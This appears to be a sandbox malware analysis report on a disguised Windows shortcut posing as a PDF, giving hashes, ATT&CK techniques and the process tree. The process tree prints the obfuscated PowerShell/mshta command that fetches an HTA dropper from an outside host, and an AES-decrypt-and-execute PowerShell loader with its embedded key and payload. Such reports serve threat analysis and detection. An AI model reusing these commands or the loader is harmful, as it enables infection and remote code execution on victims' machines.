a06aa1b7dae18601bae1fe1d840fcd0cfd8198d7ae12e29214eccc3bcd082a1c

General

Target

filepdf.pdf.lnk.download.lnk
Size

1KB
MD5

25840bfeb06a9efbd1494278daf47d51
SHA1

30379cfd8c42b5f9e4fc8bf5515fd7aca444fe96
SHA256

a06aa1b7dae18601bae1fe1d840fcd0cfd8198d7ae12e29214eccc3bcd082a1c
SHA512

391c11cfc85c0245c540e03457ef5bca90dd68d0e3c5ca93374c817a93365b04213cf2fea17243e9b9f2c393b88d4e9c34d4242b1b511acf1d454a9ef8d060b5

Score

10^/10

execution

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://ukr-netdigitalhub.pro/x64dbg2

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	2756	mshta.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2496	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2736	powershell.exe
2496	powershell.exe
2040	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeDebugPrivilege	2496	powershell.exe
Token: SeDebugPrivilege	2040	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2580 wrote to memory of 2736	2580	cmd.exe	31
PID 2580 wrote to memory of 2736	2580	cmd.exe	31
PID 2580 wrote to memory of 2736	2580	cmd.exe	31
PID 2736 wrote to memory of 2756	2736	powershell.exe	32
PID 2736 wrote to memory of 2756	2736	powershell.exe	32
PID 2736 wrote to memory of 2756	2736	powershell.exe	32
PID 2756 wrote to memory of 2496	2756	mshta.exe	34
PID 2756 wrote to memory of 2496	2756	mshta.exe	34
PID 2756 wrote to memory of 2496	2756	mshta.exe	34
PID 2496 wrote to memory of 2040	2496	powershell.exe	37
PID 2496 wrote to memory of 2040	2496	powershell.exe	37
PID 2496 wrote to memory of 2040	2496	powershell.exe	37

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\filepdf.pdf.lnk.download.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2580
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')http://ukr-netdigitalhub.pro/x64dbg2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2736
- - C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" http://ukr-netdigitalhub.pro/x64dbg2
    3⤵
    - Blocklisted process makes network request
    - Modifies Internet Explorer settings
    - Suspicious use of WriteProcessMemory
    PID:2756
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $eoXTm = 'AAAAAAAAAAAAAAAAAAAAAOhRfbfB0Z9oGAoMOSgiWW1szkJpy8tdpzZDtTrcpHQQScNLpta757CP3/Lp9GzqMSWF/7chhFbpK5jnKm5l5GflMVIeicKnQ3tCZoPwc82rCUKi+CN+28+YgJKXEr7fHV7bfPtkkKl/IfCV5knblgZoHjLo4alPfj3vVP9+W9dBhO1jttLCgLMu7VdweZbJhA9uHOeLEKlpTmwZhy6SBRt+2wZEQ+dEohArTgBqoSvdX1qI7jixQKp5YBiIhsJS7u1Qvr/smE9NMnRlLj8eZrE59UY+w09WbevvaCeXh61O6h2aDTpepoYId9+yEwU1DPB0GqmbzCA9QdOulsJz6fVjaGogYMrT5S7XHNY3b3K8Fds6PLI9RHngZogzd88E91dJ6Cp8l8L/0YhXqmbYzQWWtalFkji34QstydprFtIIkBj5NVpQsyMwuAirXLzRAYWUXfeXCL3bsXMbhndHMmjL5UIxljin3QbIc2iew7JoG9NPIrW1cJfuakC0Y/jFAEgey3tAySeNXUsyn3/Kdn7oJodxLIwRjwHaRO3ZSEvHxH3ar969bzsawhe34Ij3+d5OxiDnJyriW04WUQmnSpB1IiiK4H4ozAiv0sv12aPGF8M5NRhzJu5xw+dCgvgsCfFx1DUJKwQ45ufm9okusl0jpVx/O+uTL+C+FQgu6Pua4CqcOdudMNHchFijnXMID9n3adXAQrcb1tSG8Brkp0jI3sJ2d3eDgc5ERd3aZTVLrVW9YlDfWNKaNDKY0xTYJy2El0nQ1GJXLH9ZEqQjU5MWZDkryrQ2MJMkbIoRuofhdgf1Lbm0S6cGLVrPnryhnI9zO+hc3RM1f3C+NWNNFesGiRNQ8BKhRbBeJPuKvNyofEthadpJdc7RwBzuvcVrz8PfmhSwy+CNbj+mIRYU9mFJiv9fT4YKiVpQsGiZxKUu';$kPWuaVGM = 'Y1ZpbW5aY0ZUT2xpV0ZVd2FHbGNzS0Z6b2hBSHN5ZVg=';$gnuKIz = New-Object 'System.Security.Cryptography.AesManaged';$gnuKIz.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gnuKIz.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gnuKIz.BlockSize = 128;$gnuKIz.KeySize = 256;$gnuKIz.Key = [System.Convert]::FromBase64String($kPWuaVGM);$hGgdN = [System.Convert]::FromBase64String($eoXTm);$RaRaLJdR = $hGgdN[0..15];$gnuKIz.IV = $RaRaLJdR;$jhyJONfqz = $gnuKIz.CreateDecryptor();$ugCNpUbNf = $jhyJONfqz.TransformFinalBlock($hGgdN, 16, $hGgdN.Length - 16);$gnuKIz.Dispose();$mNOLJITf = New-Object System.IO.MemoryStream( , $ugCNpUbNf );$pvQGtgpn = New-Object System.IO.MemoryStream;$AjWBPWyhL = New-Object System.IO.Compression.GzipStream $mNOLJITf, ([IO.Compression.CompressionMode]::Decompress);$AjWBPWyhL.CopyTo( $pvQGtgpn );$AjWBPWyhL.Close();$mNOLJITf.Close();[byte[]] $AeGlbG = $pvQGtgpn.ToArray();$qNgJt = [System.Text.Encoding]::UTF8.GetString($AeGlbG);$qNgJt | powershell -
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2496
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BH64P0P2VZAN45OKOQYN.temp

Filesize
7KB

MD5
792935c0a7a5be023aa9c161e03ebbda

SHA1
c44069fee7eac636d823e3393bcb0c1b48aac976

SHA256
38c4b7332e92aa6bb8dba04a3886c5ad8f77599f3140270ce7d6a8989b8f4ca6

SHA512
b74ee6c2da66927f8a2de8d0ab5fcabd3fb9cbe775ef91e7222d04d0eec5a9d0bdaf86970a759ff23cdb658a67f772b155e33a385936c777b99f1276aba4d8d7

Download Submit
memory/2496-50-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download
memory/2496-51-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/2736-38-0x000007FEF549E000-0x000007FEF549F000-memory.dmp

Filesize
4KB

Download
memory/2736-40-0x0000000002330000-0x0000000002338000-memory.dmp

Filesize
32KB

Download
memory/2736-39-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

Filesize
2.9MB

Download
memory/2736-41-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp

Filesize
9.6MB

Download
memory/2736-43-0x00000000028FB000-0x0000000002962000-memory.dmp

Filesize
412KB

Download
memory/2736-42-0x00000000028F4000-0x00000000028F7000-memory.dmp

Filesize
12KB

Download
memory/2736-58-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing